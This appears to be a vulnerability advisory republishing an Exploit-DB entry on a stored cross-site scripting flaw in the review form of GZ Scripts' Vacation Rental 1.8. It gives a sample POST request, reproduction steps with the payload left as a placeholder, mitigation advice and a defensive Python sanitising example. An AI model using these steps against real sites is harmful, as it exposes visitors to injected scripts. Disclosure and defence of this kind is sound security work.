Vendor: Vacation Rental
By: CraCkEr
CVSS: 7.5 (HIGH)
Vulnerability: Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: Vacation Rental
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: NO
Related CWE:
CPE: a:gz_scripts:vacation_rental:1.8
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro
Year: 2023

Vacation Rental 1.8 – Stored Cross-Site Scripting (XSS)

Vacation Rental 1.8 is vulnerable to stored cross-site scripting (XSS). The vulnerability exists in the 'username', 'title', and 'comment' parameters of the POST request that submits a customer review. An attacker can inject malicious scripts into these parameters, and the scripts are stored and then executed in the victim's browser when the victim visits the affected property page or the reviews page. This allows the attacker to manipulate the content of the site and potentially perform further attacks.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before displaying it on the website. This includes the 'username', 'title', and 'comment' fields. Additionally, the vendor should implement a review management section in the administration panel to allow for easy management of reviews.
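One way to apply this mitigation to the three review fields, as an added example that is not the vendor's code: it validates the fields before storage and HTML-encodes them at output time. The length limits, function names and HTML template are assumptions, and the sample review is constructed.

```python
import html
import unicodedata

# Assumed length limits; the product's real limits are not given on the page.
LIMITS = {"username": 50, "title": 120, "comment": 2000}


class ReviewError(ValueError):
    """Raised when a review field fails input validation."""


def clean_review(form: dict) -> dict:
    """Validate the free-text review fields before they are stored."""
    cleaned = {}
    for field, limit in LIMITS.items():
        value = unicodedata.normalize("NFC", str(form.get(field, ""))).strip()
        # Line breaks and tabs are legitimate only in the multi-line comment.
        allowed = "\n\t" if field == "comment" else ""
        if any(unicodedata.category(c) == "Cc" and c not in allowed for c in value):
            raise ReviewError(f"{field}: control characters are not allowed")
        if not 1 <= len(value) <= limit:
            raise ReviewError(f"{field}: length must be 1..{limit}")
        cleaned[field] = value
    return cleaned


def render_review(review: dict) -> str:
    """HTML-encode every stored value at output time (hypothetical template)."""
    e = {k: html.escape(v, quote=True) for k, v in review.items()}
    comment = e["comment"].replace("\n", "<br>")  # added after encoding
    return (
        f'<article class="review" data-author="{e["username"]}">'
        f'<h3>{e["title"]}</h3><p class="author">{e["username"]}</p>'
        f"<p>{comment}</p></article>"
    )


if __name__ == "__main__":
    # Constructed sample: markup and quote characters in each field.
    sample = {"username": 'Ann" x="1', "title": "<b>Great</b> stay",
              "comment": "Line one\n<i>two</i> & more"}
    print(render_review(clean_review(sample)))
```

Validation alone does not make the values safe to display; the encoding in `render_review` is what keeps stored markup inert in both element and attribute contexts.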

Exploit-DB raw data:

# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/vacation-rental-website.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Stored XSS

------------------------------------------------------------
POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1

property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
------------------------------------------------------------

POST parameter 'username' is vulnerable to XSS
POST parameter 'title' is vulnerable to XSS
POST parameter 'comment' is vulnerable to XSS

## Steps to Reproduce:

1. Surf (as Guest) - Go to any Listed Property
2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
3. Inject your [XSS Payload] in "Username"
4. Inject your [XSS Payload] in "Title"
5. Inject your [XSS Payload] in "Comment"
6. Submit
7. XSS Fired on Local Browser
8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]

Note: I think the Administration Panel is missing a section to manage [Reviews] on the website; this feature must be added in the next updates [View/Edit/Delete].